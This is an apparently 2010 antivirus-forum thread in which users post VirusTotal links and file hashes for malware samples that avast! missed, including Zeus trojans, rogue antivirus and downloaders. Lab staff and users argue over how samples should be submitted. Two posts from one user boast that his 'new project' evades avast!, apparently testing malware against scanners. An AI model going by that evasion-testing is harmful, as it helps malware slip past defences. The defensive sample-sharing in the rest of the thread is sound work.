SHA1 : e734bb114c2f47dc900d3a5a526db94f0b752ba0
SHA256: 5b3d4395b0f5acd40bc20f4bf3930cbd14da3d240ad67f7ab9a65de0681e8742
-
TROJAN (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=e626cd0afc2a086eefd7d65275391e784416ce1364b13fe79eb28a9329e770c1-1286754374
MD5 : c4d4ab9ca427c0cbae557a7c2f374410
SHA1 : 089d2718b4d12fde47d605862e309c97794f6cf8
SHA256: e626cd0afc2a086eefd7d65275391e784416ce1364b13fe79eb28a9329e770c1
-
How can you say this is a missed sample, as nothing on Virustotal detects anything on that sample?
-
How can you say this is a missed sample, as nothing on Virustotal detects anything on that sample?
Is Virus Total the holy grail? Just because none, at this time, detects a thing, does it mean it is nothing? ???
I've been adding reports that some do detect, most do detect, and I got this one that none detect so far. But it is related to Zeus.
If, among all, avast! also does not detect it, then I can assume it misses it? ???
-Edit-
Or am I only supposed to post reports that others do detect, but avast! doesn't yet? If so, then I apologize, as I got confused.
-
m00nbl00d, are you following the suggestions at the first post of the thread?
Otherwise, the reports will have very little value after all.
-
VirusTotal: 2/43
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1286779262
Heuristic.BehavesLike.Win32.Suspicious.H (McAfee-GW-Edition)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
.
-
Trojan (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71-1286801243
MD5 : bd41f21be524da820c4f555c7d157e60
SHA1 : da36d0c020debd1be81e48993d81628b104a925e
SHA256: 380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71
Detected by McAfee-GW-Edition as Heuristic.LooksLike.Win32.Suspicious.F
ROGUE
http://www.virustotal.com/file-scan/report.html?id=5c052870ce034a1600187282e290c56cefef7c592e2dfcc054149a3e00630f76-1286801600
MD5 : fe65a0eb0d8f6b38ada4bf55af56ae6a
SHA1 : b4d3317591131869dc4e90b109a95cb8353e0e2b
SHA256: 5c052870ce034a1600187282e290c56cefef7c592e2dfcc054149a3e00630f76
TROJAN (Zeus related)
http://www.virustotal.com/file-scan/report.html?id=48061ade1f85d7040bca8bf056c95be8dc8568658841314db4874eeb699a0cbf-1286801855
MD5 : 8279e011750c6499e01026f2aa370d56
SHA1 : 69e333fbc316e63c23284f1b1312c6782e908515
SHA256: 48061ade1f85d7040bca8bf056c95be8dc8568658841314db4874eeb699a0cbf
-
VirusTotal: 22/43
http://www.virustotal.com/file-scan/report.html?id=ecea9a1c297b62c4c1fb9c21a92dc50277eba60c53e0c91a701981f2a05db6fd-1286855009
TR/Spy.Banker.Gen (Avira)
MD5 : 09580a2d997b6b4c9d68e781b32364be
SHA1 : dc8c09b0651ba125dfcffe70e15faa3a9fafb061
SHA256: ecea9a1c297b62c4c1fb9c21a92dc50277eba60c53e0c91a701981f2a05db6fd
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=380087229a5a6182c5b1ccd78e1cd4ac6e0275f2b3623f78272c816fd07b2d71-1286865579
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=45873cade00ef2de771777511673b53ad3ca9f851f0cb57adcf90ff23f3b90c4-1286891196
MD5 : d04954c1a4cf72d14f365a7bb9e6d60d
SHA1 : d1113e86c6f739ee82837e44cec068fb27ffdafa
SHA256: 45873cade00ef2de771777511673b53ad3ca9f851f0cb57adcf90ff23f3b90c4
ROGUE
http://www.virustotal.com/file-scan/report.html?id=4851da897bf2992b5daa3cdc4b3dd4d0103d27b63e9201fc25fb9125fbbeab3f-1286892008
MD5 : 0b157157b293430fb8c9a35ae17fd0d8
SHA1 : 969e2500c38c80c4a5d3911d096c0fed435fcd49
SHA256: 4851da897bf2992b5daa3cdc4b3dd4d0103d27b63e9201fc25fb9125fbbeab3f
ROGUE
http://www.virustotal.com/file-scan/report.html?id=ecb766252fa425d4d7610517f49509fefd4e81e1053aefb6eba7d3d5cf04e05b-1286892878
MD5 : d92514a45a5eac2a1d2dec8dd33c81da
SHA1 : 3f4af4537658bdf507a444e1ec10d6c3a0c4899f
SHA256: ecb766252fa425d4d7610517f49509fefd4e81e1053aefb6eba7d3d5cf04e05b
ROGUE
http://www.virustotal.com/file-scan/report.html?id=8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac-1286893115
MD5 : 6991987f5404662c57f9d4ab8b6a1851
SHA1 : 15e86de816047e3ccef0f86d449b811e1bd266f3
SHA256: 8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac
TROJAN
http://www.virustotal.com/file-scan/report.html?id=8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac-1286893115
MD5 : 6991987f5404662c57f9d4ab8b6a1851
SHA1 : 15e86de816047e3ccef0f86d449b811e1bd266f3
SHA256: 8444e1b069e7060001f040e1d2b4eab5fc08397a0de5571c61d456a194bc6dac
-
TROJAN
http://www.virustotal.com/file-scan/report.html?id=3cab860e5ab2c7dfac5f1bd656b0b31e58aa3d42cbdd67fdfbd0dc3591e68f4a-1286894775
MD5 : 19283d1343ef0be90a317198585520c1
SHA1 : ad6918b1a630ae229eebe2bb2c240f4439691d31
SHA256: 3cab860e5ab2c7dfac5f1bd656b0b31e58aa3d42cbdd67fdfbd0dc3591e68f4a
TROJAN
http://www.virustotal.com/file-scan/report.html?id=26ca928094211abe9f24a3d0c5fc35484782db8ec2b6c45e92bbf3ebdfe3db9e-1286894999
MD5 : 124960c4b1e002ac7725308e7912a64f
SHA1 : 067f5934d94b670f4b7e04f0e25d21d0f25e8f0d
SHA256: 26ca928094211abe9f24a3d0c5fc35484782db8ec2b6c45e92bbf3ebdfe3db9e
-
VirusTotal: 20/41
http://www.virustotal.com/file-scan/report.html?id=82a91174739fd00ec38c31c41ecf3268aad3a9cc07ceb6923635d65276cff982-1286909055
TR/Crypt.XPACK.Gen (Avira)
MD5 : 79a137546440b649d05a74b74d26fb39
SHA1 : 87bd2f282ca5501173e2b995fb8711936dbdcec7
SHA256: 82a91174739fd00ec38c31c41ecf3268aad3a9cc07ceb6923635d65276cff982
-----------------------------------------------------------------------
VirusTotal: 19/40
http://www.virustotal.com/file-scan/report.html?id=1160b9f1934a9dd9231f31560b99a0701c44c0c2c605fdbdeadd05285e3452a4-1286909991
TR/Crypt.CFI.Gen (Avira)
MD5 : 98a0cd18c03892c7f83148afa4c13ffb
SHA1 : b0428d8f55273ba3e45f3fb71bb1c1e91a4211f6
SHA256: 1160b9f1934a9dd9231f31560b99a0701c44c0c2c605fdbdeadd05285e3452a4
-------------------------------------------------------------------------
VirusTotal: 19/42
http://www.virustotal.com/file-scan/report.html?id=013903434d8cd9cebe8913def0a0022c1ac03ac30b9ee319c404c770d186b93d-1286910374
TR/VB.Downloader.Gen (Avira)
MD5 : e761ffd4493bc56044fef408b43cd387
SHA1 : 17208a7048df26c696ba395112f041fabd98abd5
SHA256: 013903434d8cd9cebe8913def0a0022c1ac03ac30b9ee319c404c770d186b93d
-------------------------------------------------------------------------
VirusTotal: 19/41
http://www.virustotal.com/file-scan/report.html?id=0dff24330bc30faeec1b36e6f9c535359f7344d839748149f743f3f307be96f1-1286910870
TR/VB.Downloader.Gen (Avira)
MD5 : addf29b4e4c8b875fbcef278bf66a7db
SHA1 : 0d069f5bc1faeeb38be5ee57e370620e88296f73
SHA256: 0dff24330bc30faeec1b36e6f9c535359f7344d839748149f743f3f307be96f1
---------------------------------------------------------------------------
VirusTotal: 21/43
http://www.virustotal.com/file-scan/report.html?id=c80367480094aa649ad0b9914b9c1cb4c6320101ee3bae4bda6775a0ab736db6-1286913569
TR/Crypt.CFI.Gen (Avira)
MD5 : 9c75702f09b15fef35f205b12d4f15e6
SHA1 : 5109a83bf5b5f06fe640c84b2e2665ea1cb38c5d
SHA256: c80367480094aa649ad0b9914b9c1cb4c6320101ee3bae4bda6775a0ab736db6
-----------------------------------------------------------------------
I will not send more until these are detected by avast.
-----------------------------------------------------------------------
EDIT:
This has not been detected yet by avast:
VirusTotal: 2/43
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1286779262
Heuristic.BehavesLike.Win32.Suspicious.H (McAfee-GW-Edition)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
.
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=b542593a97bb9fa1e949e3daf4ec7ea22884295745ff2b93e48218bc3f2729e9-1286984588
MD5 : ae57cb81a246972e63378c956744291d
SHA1 : 0397683698f9bf209a883e7b1e7100ace35c0239
SHA256: b542593a97bb9fa1e949e3daf4ec7ea22884295745ff2b93e48218bc3f2729e9
TROJAN
http://www.virustotal.com/file-scan/report.html?id=9f7f7a40c51de30a9f2160b72865ac7323c0394de3dfce7b0e58e5de63eac756-1286985392
MD5 : e3f83a9d5591d149ea54fef696bcdad8
SHA1 : e02f0b4692fcf2bf595ef391c73b9f482adea09d
SHA256: 9f7f7a40c51de30a9f2160b72865ac7323c0394de3dfce7b0e58e5de63eac756
ROGUE
http://www.virustotal.com/file-scan/report.html?id=79bb43c75546db0bc1ad0cc27529198ab60980a151c82ac4eb5a416905645f9e-1286985963
MD5 : 29ef8c98b57185bcc4ff8c5c9c494da8
SHA1 : 6aecfe6a72be9f409f8b4144a458e3e45be6fee5
SHA256: 79bb43c75546db0bc1ad0cc27529198ab60980a151c82ac4eb5a416905645f9e
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=cef9cc3be07749b2472130560b793c4ed7642ec856d1104fa6b71ff8bad62a74-1286986116
MD5 : c59ef71540aa1735c31c3c3d9bb32958
SHA1 : 069f811b4c3d0b35d481fbc697580bfae7339070
SHA256: cef9cc3be07749b2472130560b793c4ed7642ec856d1104fa6b71ff8bad62a74
-
ROGUE
http://www.virustotal.com/file-scan/report.html?id=50880380b9a2a368c0460a580895041b7f32c468efbd1bd08ce300c926ea6cd0-1286986285
MD5 : bdb6615f4a274bfd159436148fdbe1c7
SHA1 : a70441c652e6e43cac7e2ac513834fb36d0574ba
SHA256: 50880380b9a2a368c0460a580895041b7f32c468efbd1bd08ce300c926ea6cd0
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=6319188830903712b4296b6e9c6ece7e53a1232035786d0f218c340c78332b93-1286986548
MD5 : ace6aec48663a0179af2e60cceb2ebb4
SHA1 : 733f7be9011302f17d9cae440056754d5301dd1f
SHA256: 6319188830903712b4296b6e9c6ece7e53a1232035786d0f218c340c78332b93
-
VirusTotal: 22/42
http://www.virustotal.com/file-scan/report.html?id=aba7f0ddd813cf99259c753f5a149098289760097df9de7ee01cebd74d31009d-1287036007
TR/Crypt.CFI.Gen (Avira)
MD5 : 37e1eaf4cd3f80e9618942e0708a16e1
SHA1 : 32c06264c68a800a3b2e3ad2ffb9935e73f31ece
SHA256: aba7f0ddd813cf99259c753f5a149098289760097df9de7ee01cebd74d31009d
ssdeep: 6144:WdPTN03baw5APiU/twz4+skBXShTdYREeycaekOLtOK7LSEIRkCAsuuzps5u6rnJ:WNTN03NU2KOMWVaekXK7L8y9I6db
File size : 347136 bytes
First seen: 2010-10-14 06:00:07
Last seen : 2010-10-14 06:00:07
----------------------------------------------------------------------------
VirusTotal: 6/42
http://www.virustotal.com/file-scan/report.html?id=65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896-1287047835
Delf.TTZ (AVG)
MD5 : 6355177091f224eb970c365e4d06b269
SHA1 : 89361620e489c1876963c32e555afe7d58b9ca04
SHA256: 65a6508e8b43a54a17d5c20c49fbe20f68b12fe5517d1c5dfa41b0540bf64896
ssdeep: 12288:tUmTk8F0KhaR2s68HbHyD1PzLqkRp+fg2b:xQ8fsv2PSwpH2
File size : 527360 bytes
First seen: 2010-10-10 17:59:33
Last seen : 2010-10-14 09:17:15
------------------------------------------------------------
VirusTotal: 20/42
http://www.virustotal.com/file-scan/report.html?id=bed57775dc2f9870c11671906f6cdddbe20983efe269830bbb488dadf4aae5f4-1287049482
TR/VB.Downloader.Gen (Avira)
MD5 : c799242d0c38bd81b965bfd119ca47c3
SHA1 : e71a8e46fa74811288c6237320c9758b851bcb69
SHA256: bed57775dc2f9870c11671906f6cdddbe20983efe269830bbb488dadf4aae5f4
ssdeep: 768:OuSPC8w03SCUSDZArU83z555o3kVZ6+XNZXRuvCfJ4lcdfbIDX4U/rx:+00CzeZfII346+XLXFr5bIhx
File size : 159744 bytes
First seen: 2010-10-14 09:44:42
Last seen : 2010-10-14 09:44:42
-
TROJAN/ZEUS
http://www.virustotal.com/file-scan/report.html?id=e521d9d4610d90067b50df211240e0c72bbecf266bfa9dd29f999f28e6030493-1287058668
MD5 : a94d8d952e071d5897fa6ef1539c6e59
SHA1 : b956f5ec6319470210532600e58663b7bd6e883f
SHA256: e521d9d4610d90067b50df211240e0c72bbecf266bfa9dd29f999f28e6030493
-
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
These VT links on the forum don't help us at all; you can include them in the email body.
Milos
-
I am glad my new project is not detected by avast ;D 8)
anyway -.-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287084779
-
VirusTotal: 20/43
http://www.virustotal.com/file-scan/report.html?id=832d7c815110ce43b58cdf66f7d6386bb249af0038152f3fa912ca61bef58cff-1287108590
TR/VB.Downloader.Gen (Avira)
MD5 : 21b4f22fb4f09ad1e70afb41684b5103
SHA1 : fefba4a9fa348f655db4b1f9a902c05484f44ae7
SHA256: 832d7c815110ce43b58cdf66f7d6386bb249af0038152f3fa912ca61bef58cff
ssdeep: 768:AuSZEjw03SCU63BET555IHY1ZZ+XjXQWIxVkguu:wV0Cz63O1oHkZ+XjXfgr
File size : 159744 bytes
First seen: 2010-10-15 02:09:50
Last seen : 2010-10-15 02:09:50
------------------------------------------------------------------------
VirusTotal: 21/43
http://www.virustotal.com/file-scan/report.html?id=cd5470605c564b8f7bca95e59eb9c15198d7935aa6fc5edb5de2bd58f5c61a8c-1287109607
TR/Dropper.Gen (Avira)
MD5 : ffb0f91b6f4baa70011a2b6615dcb0c9
SHA1 : aae7264e23e2bac578c7b4671fc7171a05432c58
SHA256: cd5470605c564b8f7bca95e59eb9c15198d7935aa6fc5edb5de2bd58f5c61a8c
ssdeep: 12288:3w4VrnE/2foyCqHFlznwl1YlZBCj/XRr7Y3hh:A4VrnMCoyRwl18Bm/Xkhh
File size : 414562 bytes
First seen: 2010-10-15 02:26:47
Last seen : 2010-10-15 02:26:47
-
File name: Avast AntiVirus 4.7.x keygen by-GCT.r00
Submission date: 2010-10-15 12:10:08 (UTC)
Current status: finished
Result: 7/43 (16.3%)
Gen:Variant.Kazy.1653 (BitDefender)
http://www.virustotal.com/file-scan/report.html?id=b97507708b29aaba8d99f70e5c74a1534e2dbc6d5ad661db0fa19effa8d56f87-1287144608
-
Why are you all not taking any notice of what a member of the avast virus labs is saying? This topic is pointless.
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
These VT links on the forum don't help us at all; you can include them in the email body.
Milos
So please do as suggested: send the samples to avast. So I guess the next step is in your hands, send the samples and stop posting, or I guess this topic will be closed too.
-
Why are you all not taking any notice of what a member of the avast virus labs is saying? This topic is pointless.
Hello,
I think that the best way is to send the files to virus@avast.com with subject "Undetected malware".
These VT links on the forum don't help us at all; you can include them in the email body.
Milos
So please do as suggested: send the samples to avast. So I guess the next step is in your hands, send the samples and stop posting, or I guess this topic will be closed too.
I sort of disagree. When sending samples to www.virustotal.com, it gives a general idea of the speed the different security vendors apply to bring out new detections for their products, free and paid. I've come across one sample from September which avast! still did not detect. Most of them did. I didn't post it here, but for sure avast! got it, because the sample I checked wasn't uploaded first. It was a recheck.
So, threads like this one here serve to show that the user base isn't blind, and is actively seeing whether or not the security tools they chose to use are able to detect threats or not, and how fast they do it.
I believe the normal thing to do is to send to www.virustotal.com, because that way we'll be helping every other person making use of other security solutions.
If there are samples that are weeks old, and avast! still doesn't detect them, then for sure, I believe it's in everyone's best interest to know that it doesn't, yet.
I guess it is a matter of perspective. For the avast! team it may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
Regards
-
There is nothing wrong in sending samples to virustotal; no one has suggested you shouldn't do that. In fact it is contrary to what Milos suggested: a) send the samples to avast and b) if you did submit to virustotal, put the results link in the email body of the submission.
Regardless of what you think of the topic showing the user base isn't blind, it doesn't help the virus labs at all (as Milos said); they need samples.
If you check the first post of this topic, as to the purpose it was intended:
http://forum.avast.com/index.php?topic=64122.msg541929#msg541929
I'm starting a new one trying to help avast improving detection if possible.
So as Milos and Maxx mentioned, simply posting links to virustotal results in this topic doesn't meet Tech's hope to help detections on its own: "These VT links on the forum don't help us at all; you can include them in the email body."
-
So as Milos and Maxx mentioned, simply posting links to virustotal results in this topic doesn't meet Tech's hope to help detections on its own: "These VT links on the forum don't help us at all; you can include them in the email body."
avast is it ...
If you are not satisfied with that, replace the antivirus.
End!
:'(
-
I sort of disagree. When sending samples to www.virustotal.com, it gives a general idea of the speed the different security vendors apply to bring out new detections for their products, free and paid. I've come across one sample from September which avast! still did not detect. Most of them did. I didn't post it here, but for sure avast! got it, because the sample I checked wasn't uploaded first. It was a recheck.
+1
Although we need to consider the sheep-like behavior of virus total and the rush not to detect but to not look bad in the picture...
So, threads like this one here serve to show that the user base isn't blind, and is actively seeing whether or not the security tools they chose to use are able to detect threats or not, and how fast they do it.
I think the same.
I believe the normal thing to do is to send to www.virustotal.com, because that way we'll be helping every other person making use of other security solutions.
I disagree. The good thing to do is what allows us to get better detection (and protection) asap. So I think we need to follow a way that helps, not a way that we think helps...
If there are samples that are weeks old, and avast! still doesn't detect them, then for sure, I believe it's in everyone's best interest to know that it doesn't, yet.
It's difficult to say, as the samples could be infinite; the garbage could be very huge.
So, trying to verify 50,000+ samples a day will move us toward this "lockout" of technology.
That's the reason for asking about other alternatives to the "signatures-only" method of detection.
I guess it is a matter of perspective. For the avast! team it may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
That's one of my intentions in opening this thread.
-
<snip>
I guess it is a matter of perspective. For the avast! team it may make no sense and have no use, but maybe it is of use for the user base, so they know whether or not their chosen AV is able to detect or not, and for how long it will remain unable to detect, and obviously, protect them. ;)
That's one of my intentions in opening this thread.
As far as perspective goes, if no one who posts VT results in this topic goes back, checks whether they are now detected by avast (no longer missed) and edits their post to say they are now detected, then there is no perspective at all, only a list of missed detections and nothing to indicate when they are detected, so I don't see how that helps the user base.
Just browse through this topic and see just how many people follow up their post when the sample is detected and you will see how unbalanced it is, so it is very one-sided. Given that, I don't feel it can provide any useful information for the user base to make an informed decision on missed samples and when they are included in the database if no one is modifying the original posts when it is detected.
-
MD5 : 5e397750d32baa7d37f27d144fe4e2c4
SHA1 : 7281aa700b1703f4d1528aac7cc314e52817e848
SHA256: 9202e99fdc324ea8f53549d0c01a5a1dc225350fa923add6fbcdbe529dda4107
ssdeep: 3072:qqavcStFlrE8j6ptIxYhEK4QRzEYX2CPWkLUh4QPSCHnfkW:aHtFlg1pFx4QEq2CjloSCH
http://www.virustotal.com/file-scan/report.html?id=9202e99fdc324ea8f53549d0c01a5a1dc225350fa923add6fbcdbe529dda4107-1287166710
2. http://www.virustotal.com/file-scan/report.html?id=05182bc7bde7bfd9dfbb6ece0f5bb368eb999e70637b4e4cdf7e75a6599b59e7-1287168704
(http://prikachi.com/images/305/2585305j.png)
-
As far as perspective goes, if no one who posts VT results in this topic goes back, checks whether they are now detected by avast (no longer missed) and edits their post to say they are now detected, then there is no perspective at all, only a list of missed detections and nothing to indicate when they are detected, so I don't see how that helps the user base.
You're fully right. I've tried to do this at the beginning but, believe me, it's boring, boring, boring. It takes molasses for avast to add some detections... And will we keep checking, checking and checking?
-
I know it is boring and a real chore, which is why it will always be one sided.
Since some of the virus labs team have said that the VT Results on their own are of no help, I really can't see the purpose of this topic at all if people aren't going to update their previous posts when they are detected. That in the last 8 pages of this topic is woefully lacking.
If people submit the samples from the chest (with VT Results link and brief info), they can at least scan it from within the chest to see if it is included, if not it is very simple to submit it again and again and again if necessary.
The files that I submit from the chest, I test weekly and perhaps I've been lucky most are added, but some take a second or third submission. I submitted one yesterday a UPS email scam one and it is detected today, see image.
-
I really can't see the purpose of this topic at all
Read again the other purposes of this thread... Maybe the virus labs aren't the only ones who are looking for benefits... Maybe we don't have to shut up just because of that. Why do they worry about this thread then? Just let it be as it is... Or is there something more to it, and they are not comfortable with this thread?
submit it again and again and again if necessary.
We're not stupid... We won't keep submitting files just to bring up attention.
There is a more serious way to work.
There is something more fun to do.
The files that I submit from the chest, I test weekly and perhaps I've been lucky most are added, but some take a second or third submission. I submitted one yesterday a UPS email scam one and it is detected today, see image.
Henrique is submitting a lot of trojans active here in Brazil.
avast never has the fastest detection... ever...
-
I simply can't see any other benefits/purposes of this topic which I think you stated quite clearly in the first post, to help improve detections and that clearly isn't happening as they have no samples to work from and you can't attach them or post links to file sharing sites (why the last topic on this was closed).
No one is saying you are stupid - If you aren't prepared to a) modify old posts in this topic when they are detected and/or b) resubmit from the chest if after a reasonable time they aren't detected, then don't bother. No one is standing over anyone with a stick, but me having gone to the trouble to submit a file I generally see it through to the end.
Yes Henrique is and if you remember rightly Maxx was trying to do something different so he could submit directly using ftp or other means.
-
I thought that security vendors would get the samples from Virus Total? They do, don't they? So, after all, there seems to be a point in sending them to Virus Total, because avast! will get them.
Anyway, I just wanted to help. I personally make no use of avast!, but I do have friends and family members who do, and for sure it would help a lot if the avast! team were faster providing new detections for not-so-new malware. I'm pretty sure some other friends make use of other solutions like AVG, or whatever it may be; hence the reason I upload the samples to Virus Total and not just to one vendor. It would seem rather odd.
Also, there's no point in modifying posts after 1 day or even 3 days. If, say two weeks have passed and still no detection for XYZ sample from avast!, then yes, give an update. The same if a detection is already out.
Anyway, if avast! team considers this thread to be trivial, then I'm done.
Cheers
-
I said it many times: We get *T*E*N*S* of *T*H*O*U*S*A*N*D*S* of files a day. We're adding thousands of detections a day, most of them automatically generated and the rest is semi-manually processed by a finite number of humans. There are certain prioritizations in the process, which I admit may not be the best, but still position us in front of other products detection-wise.
Yes, I know we don't detect everything - and it's not possible to detect everything in these times.
If you submit something on VT, we'll eventually get it from them and add it to the database as soon as possible.
-
Why does the avast team not adopt another criterion?
If a sample from VirusTotal is not detected or not analyzed in a timely fashion, it gets the name given by another antivirus.
This would make avast unbeatable.
-
Because other AVs are unreliable as the source of a detection. Firstly, because they're FP-infested, and the second problem is that some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
-
some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
Kubecj, is it possible to name them? If not, I understand.
But this seems a ridiculous attitude, not respectful. It would be good to know who is playing the "bad" guy role in the game. Of course, you can prove what you say. Of course, I believe you.
-
Yes Henrique is and if you remember rightly Maxx was trying to do something different so he could submit directly using ftp or other means.
Why does Maxx not give us another direct way to send samples?
-
some vendors like to play games by creating innocent samples with their detections and then measuring how many other AVs are caught by the trap.
Kubecj, is it possible to name them? If not, I understand.
But this seems a ridiculous attitude, not respectful. It would be good to know who is playing the "bad" guy role in the game. Of course, you can prove what you say. Of course, I believe you.
http://www.securelist.com/en/weblog?weblogid=208188011
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
http://blog.eset.com/2010/02/02/kaspersky-virus-total-and-unacceptable-shortcuts
-
Better false positives or fake detections than being infected with bankers, zbots and other things ;D
But if you say so, I will start sending the samples to the lab.
-
Why does Maxx not give us another direct way to send samples?
Which other direct way?
-
Why does Maxx not give us another direct way to send samples?
Which other direct way?
ftp?
another e-mail?
-
If you submit something on VT, we'll eventually get it from them and add it to the database as soon as possible.
Oh, I did not know this!
-
Trojan (Bredolab) File name: updugt32.exe
http://www.virustotal.com/file-scan/report.html?id=9d90abb84ba08b6e9bbe3b404818123a249d12073081e073afef12a061ff8494-1287214603
Detected by Windows Task Manager - svchost.exe 100% load
-
ftp?
another e-mail?
http://forum.avast.com/index.php?topic=64122.msg546624#msg546624 ftp was mentioned already..
-
http://forum.avast.com/index.php?topic=64122.msg546624#msg546624 ftp was mentioned already..
Is the ftp this?
ftp://ftp.avast.com/incoming/
Henrique - Bankers are what bother you, right? We're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue.. if you have better samples, we can talk about processing your submission through our ftp (a daily uploaded batch with a predefined name); if you prove the quality of your feed, we can dedicate someone to its processing maybe..
What does it mean: "a daily uploaded batch with a predefined name"?
-
FTP is not a good idea - unless you are specifically asked for that (for a specific file), and the one who asked you is expecting the file there.
Having an FTP folder full of anonymous files uploaded by nobody knows who, not knowing which are malware samples, which are false positive samples, which are crash-related files, which is somebody trying to make a public warez folder, or something different... is completely useless. The content just gets deleted; there's nothing to do with that. So simply deleting the sample, or uploading it to the incoming folder on the FTP without previous arrangement, is mostly the same thing.
Another e-mail? Well, this other e-mail would, in the end, be processed exactly the same way as the usual virus@ e-mail... so what's the point?
-
What does it mean?: "a daily uploaded batch with a predefined name"
It means that if you had a significant number of samples, there could be an arrangement that you would upload them somewhere daily, in a very specific format (exact name of the archive, possibly a specific file structure inside of that archive) - and they would get somehow included into the automated processing as an additional feed.
But uploading single, randomly named files on the FTP is pointless.
-
A predefined name means a specific name known to you and the virus lab, to easily identify the file on our side. This way is applicable for larger batches of samples; single files should rather be sent via e-mail.
-
A predefined name means a specific name known to you and the virus lab, to easily identify the file on our side. This way is applicable for larger batches of samples; single files should rather be sent via e-mail.
Is it to rename the sample and send it via FTP?
Could we send the samples we get in a day one by one via FTP?
Could you give a practical example?
Please explain in simple words because my English is bad.
-
Please use the usual e-mail - it will really be easier, and the samples will be processed in exactly the same way.
-
Please use the usual e-mail - it will really be easier, and the samples will be processed in exactly the same way.
I think so too.
But the problem is there are samples that take days to be detected and others that never are.
-
But the problem is there are samples that will take days to be detected and others never are.
Yes, I see this problem, too...
-
fresh and new project
http://www.virustotal.com/file-scan/report.html?id=b10b74a90503075d471534179ba9b023ade703624b9f358335c89fcb418e5059-1287231801
-
http://www.securelist.com/en/weblog?weblogid=208188011
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
http://blog.eset.com/2010/02/02/kaspersky-virus-total-and-unacceptable-shortcuts
Thanks. Need to read everything, but seems that no names are disclosed, just the fact itself.
-
Edit/removed.....wrong answer .... :-[
-
Pondus, I was referring to the names of the sheep companies that follow the Kaspersky placebo... ::)
-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287233084
As you can see, it seems that it's not detected by avast at VT, BUT on my PC avast detected it as win32:malwaregen.weird
-
VirusTotal may be slower with VPS updates. BTW: some rogue samples should be detected now (either as Trojan-gen, Malware-gen or SuspBehav - our heuristics have been improved during this weekend and further improvements will follow as usual). If you don't have the files to make a resubmit/rescan, you can at least see the irrelevance of posting "empty" links, which you have no clue what they stand for :P
-
http://virscan.org/report/95d9541c232ebcb6b1ada20a28a0e3d3.html
http://www.virustotal.com/file-scan/report.html?id=0ed7204efd2782c04668302f973d541c3cee794649661ec3e1a3bd2278b1fa35-1287521982
-
Zbot
http://www.virustotal.com/file-scan/report.html?id=a549a0386ec2e8c0a8c6416adbce9dc60f9f91b7cf43ed4a1302b1e0dcd8210b-1287582043
-
http://www.virustotal.com/file-scan/report.html?id=54eb820a86d4afd02cb627726a7ff325d8d02ac64ac9a7861577ab074968f77f-1287682833
http://www.virustotal.com/file-scan/report.html?id=c7a90fc33e6774b0ae6be6d52e08f98ad32f8626689b2272f80592b2e72da4d6-1287682836
http://www.virustotal.com/file-scan/report.html?id=a288da956e6131a994fb9bd95e99736eef124a1c0c400e0d02601c0dffd757d8-1287681669
Sent to Avast Lab.
-
Sent to Avast Lab.
Thanks for helping improving detection.
-
http://www.virustotal.com/file-scan/report.html?id=e7f1a013004463f9f3c2c4c84cb6b9eb51418622c3c760d4557a99396f06a84d-1287233084
As you can see, it seems that it's not detected by avast at VT, BUT on my PC avast detected it as win32:malwaregen.weird
It's now found by avast, BitDefender, and my antivirus G Data, which I don't have yet.
-
http://www.virustotal.com/file-scan/report.html?id=e7c3807967df6e1bdf0c05b1a0fe28f575e95c6c3407e02cf1363013141a7c69-1287111602
I think this is 1 or 2 years old.
-
Security Tool
http://www.virustotal.com/file-scan/report.html?id=b7b1468525d0deb08a04424ebe6fa4dea8fc794994a6b1fc5ac34c3e1dfe4804-1287853988
http://www.virustotal.com/file-scan/report.html?id=5902d245f1b307dd5d10efe41c93310cf0d629d3d732172d84179c5bf3dc1fa9-1287853571
-
http://www.virustotal.com/file-scan/report.html?id=60ca507ef4ba7dbbb7ef6ea4b975b9b09a24d7d0c91d38d0876331203f962d98-1287861724
Only Avast 5 finds it, not 4.8.
It has Trojan Spambot.c and
another trojan.
-
chabbo, did you send the sample to avast?
-
chabbo, did you send the sample to avast?
If not, i have ;)
-
v4 does not detect PUPs at all, that's it..
-
Ardamax installer
